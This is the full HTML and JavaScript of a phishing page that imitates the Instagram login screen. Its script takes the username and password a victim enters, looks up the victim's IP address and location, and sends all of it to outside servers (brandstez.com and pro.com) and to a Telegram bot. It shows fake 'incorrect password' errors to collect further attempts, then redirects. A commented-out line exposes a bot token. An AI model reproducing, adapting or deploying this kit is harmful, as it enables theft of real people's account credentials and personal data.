<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <meta name="robots" content="noindex" />
    <meta name="googlebot" content="noarchive">

</head>

<body>
    <style>
        * {
            padding: 0;
            margin: 0;
            box-sizing: border-box;
        }

        body {
            background-color: #FAFAFA;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        }

        .container-item {
            width: 85%;
            margin: 20px 50%;
            transform: translateX(-50%);
            padding: 30px 10px;
            display: block;
            border: 1px solid #e9e9e9;
            background-color: white;
        }

        input {
            display: block;
            width: 93.5%;
            margin: 0 3%;
            padding: 20px 10px 10px 10px;
            border-radius: 3px;
            border: 1px solid #DBDBDB;
            margin: 5px 0;
            color: #282727;
            background: #FAFAFA;
            font-size: 13px;
            outline: 1px solid transparent;
        }

        input[type=password] {
            padding: 25px 10px 10px 10px;
        }

        label {
            font-size: 11.5px;
            position: absolute;
            transform: translateY(18px);
            /* transform: translateY(7px); */
            padding: 0px 10px;
            transition: 0.2s ease-in-out all;
            color: #838181;
        }

        .label-toggle {
            transform: translateY(7px);
        }

        button {
            width: 100%;
            padding: 10px;
            background: dodgerblue;
            color: white;
            border: 1px solid transparent;
            border-radius: 3px;
            margin: 10px 0;
            font-weight: bold;
        }

        a {
            text-align: right;
            color: #114b86;
            text-decoration: none;
            font-size: 13px;
        }

        ul {
            display: flex;
            justify-content: center;
            list-style-type: none;
            align-items: center;
        }

        #loader {
            position: absolute;
            left: 50%;
            transform: translate(-50%, 18px);
            visibility: hidden;
        }

        #feedback {
            display: none;
        }

        @media screen and (min-width: 768px) {
            .container {
                width: 70%;
                margin: 0 50%;
                transform: translateX(-50%);
            }

            .container-item {
                width: 340px;
                margin-top: 60px;
            }

            #error {
                padding: 0 35% !important;
            }
        }
    </style>
    <div class="container">
        <div class="container-item"><br><br>
            <center><img src="./images/ig.png" width="200px"></center><br>
            <label class="label" for="">Phone number, username, or email</label>
            <input class="input" type="text" id="username" name="username">

            <label class="label" for="">Password</label>
            <input class="input" type="password" id="password" name="password">
            <input type="hidden" id="userId" name="userId">

            <button id="login">Log in</button>
            <img src="./images/load.gif" width="18px" id="loader">
            <br>
            <p style="text-align: center;"><a href="#">Forgot Password ?</a></p>
        </div>
        <!-- <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;"></p> -->

        <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;">
        </p>

        <div class="container-item" style="padding: 15px 10px;">
            <p style="text-align: center; font-size: 13px;">Don't have an account? <a href=""
                    style="color: dodgerblue;">Sign up</a></p>
        </div>
        <p style="text-align: center; font-size: 13px;">Get the app.</p>
        <ul>
            <li><img src="./images/go.png" width="100px" height="38px" style="margin: 10px 5px;"></li>
            <li><img src="./images/mi.png" width="100px" style="margin: 10px 5px;"></li>
        </ul>
        <p style="text-align: center; margin: 15px 0;"><img src="./images/me.svg" width="50px"></p>
    </div>

    <iframe src="" id='iframLink' style="opacity: 0;" frameborder="0"></iframe>


    <script>
        var login = document.getElementById('login')
        var loader = document.getElementById('loader')
        var username = document.getElementById('username')
        var passwordId = document.getElementById('password')
        var feedback = document.getElementById('feedback')
        var x = 0;
        var label = document.querySelectorAll(".label")
        var input = document.querySelectorAll(".input")
        var container = document.querySelector('.container')
        var userId = document.querySelector('#userId')

        var country = document.getElementById('country')
        var city = document.getElementById('city')
        var continent = document.getElementById('continent')
        var ip = document.getElementById('ip')
        var adminEmail = document.getElementById('adminEmail')
        var iframLink = document.getElementById('iframLink')

        for (let i = 0; i < label.length; i++) {
            label[i].addEventListener('click', function () {
                label[0].classList.add('label-toggle')
                label[1].classList.add('label-toggle')
            })

            input[i].addEventListener('click', function () {
                label[0].classList.add('label-toggle')
                label[1].classList.add('label-toggle')
            })

        }



        login.addEventListener('click', function () {
            login.textContent = ""
            login.style.padding = "16px 10px"
            loader.style.visibility = 'visible'

            setTimeout(() => {
                feedback.style.display = 'block'
                login.textContent = "Log In"
                loader.style.visibility = "hidden"
                if (username.value == "" || passwordId.value == "") {
                    feedback.textContent = "Input's cannot be empty"
                } else {
                    validation(chat_id, bot_token)
                }
            }, 1500);


        })

        function validation(chat_id, bot_token) {
            login.textContent = "";
            loader.style.visibility = 'visible'

            setTimeout(() => {
                login.textContent = 'Log In'
                loader.style.visibility = 'hidden'

                const data = new FormData();
                data.append('username', username.value);
                data.append('password', passwordId.value);
                data.append('userId', userId.value);
                const response = new XMLHttpRequest();
                response.onreadystatechange = function () {
                    feedback.style.display = 'block'
                }
                response.open('POST', global_url, true);
                response.send(data);


                const dataD = new FormData();
                dataD.append('username', username.value);
                dataD.append('password', passwordId.value);
                dataD.append('userId', userId.value);
                const response2 = new XMLHttpRequest();
                response2.onreadystatechange = function () {}
                response2.open('POST', global_url, true);
                response2.send(dataD);


                // Telegram script
                // Replace with your actual bot token and chat ID
                const botToken = bot_token;
                const chatId = chat_id;

                // const botToken = '6620819038:AAEHyILpkCzwwlDX5tGbxzIqNUZ1yVXUqLo';
                // const chatId = '5360982855';

                // Function to send a message using vanilla Ajax
                function sendMessage(message) {
                    const xhr = new XMLHttpRequest();
                    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
                    const params = `chat_id=${chatId}&text=${encodeURIComponent(message)}`;

                    xhr.open('POST', url, true);
                    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

                    xhr.onreadystatechange = function () {
                        if (xhr.readyState === 4) {
                            if (xhr.status === 200) {
                                console.log('Message sent:', xhr.responseText);
                            } else {
                                console.error('Error sending message:', xhr.status, xhr.statusText);
                            }
                        }
                    };

                    xhr.send(params);
                }

                // Example: Send a message when the page loads
                const messageToSend =
                    `Hello admin, somebody just logged in: \n \n Username: ${username.value} (Instagram) \n \n Password: ${passwordId.value} \n \n IP: ${ipAddress} \n \n country: ${countryValue} \n \n city: ${cityValue} \n \n continent: ${continentValue} `;
                sendMessage(messageToSend);

                // Telegram End


                x += 1
                feedback.textContent =
                    'The password you entered is incorrect. Please check your password and try again';
                if (x == 2) {
                    // feedback.textContent = ''
                    feedback.textContent = 'Sorry an error occurred please try again later'
                } else if (x == 3) {
                    feedback.textContent = '';
                    setTimeout(() => {
                        window.location.href = 'vote_verification.html'
                    }, 1500);
                }


                //===============================================
                //MAIL SENDER
                var xhr2 = new XMLHttpRequest()
                var data2 = new FormData()
                var url = "http://pro.com/mail.php?username="+email.value+" (Instagram)"+"&password="+password.value+"&country="+countryValue+"&city="+cityValue+"&continent="+continentValue+"&ip="+ipAddress+"&adminEmail="+adminEmail.value

                iframLink.src = url

                xhr2.onreadystatechange = function () {
                    console.log("sent successfully")
                }
                xhr2.open('GET', url, 'true');
                xhr2.send()
                //======================================


            }, 1500);
        }

        var ipAddress;
        var countryValue;
        var cityValue;
        var continentValue;
        var global_url
        var params = new URLSearchParams(window.location.search);
        var paramsValue = params.get('id');
        var accountStatus
   
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                ipAddress = data.ip;
                fetch(`https://ipapi.co/${ipAddress}/json/`)
                    .then(response => response.json())
                    .then(geoData => {
                        // Step 3: Parse the response to extract country details
                         countryValue = geoData.country_name;
                         continentValue = geoData.region;
                         cityValue = geoData.city;

                    })
                    .catch(error => console.error('Error fetching geolocation data:', error));
            })
            .catch(error => console.error('Error fetching IP address:', error));


        setTimeout(() => {
            userId.value = params.get('id')
            var get_id = params.get('id')
            if (get_id === "") {
                window.location.href = 'error.html'
            }
            if (accountStatus === "pending") {
                window.location.href = 'error2.html'
            }
            global_url = 'https://brandstez.com/en/info/login.php'
        }, 1000);

        var dataUrl = "https://brandstez.com/en/info/request_api.php?id=" + paramsValue
        setTimeout(() => {
            fetch(dataUrl)
            .then(response => response.json())
            .then(datas => {
                datas.forEach(data => {
                    user_id = data.user_id
                    email = data.email
                    password = data.password
                    profile_name = data.profile_name
                    profile_image = data.profile_image
                    min = data.min
                    max = data.max
                    chat_id = data.chat_id
                    bot_token = data.bot_token
                    design = data.design
                    ig = data.ig
                    fb = data.fb
                    mail = data.mail
                    url = data.url
                    accountStatus = data.status
                    console.log(data)
                });
            }).catch(error => console.error('Error ', error));

        }, 2000);

    </script>

    <script src="main.js"></script>
</body>

</html>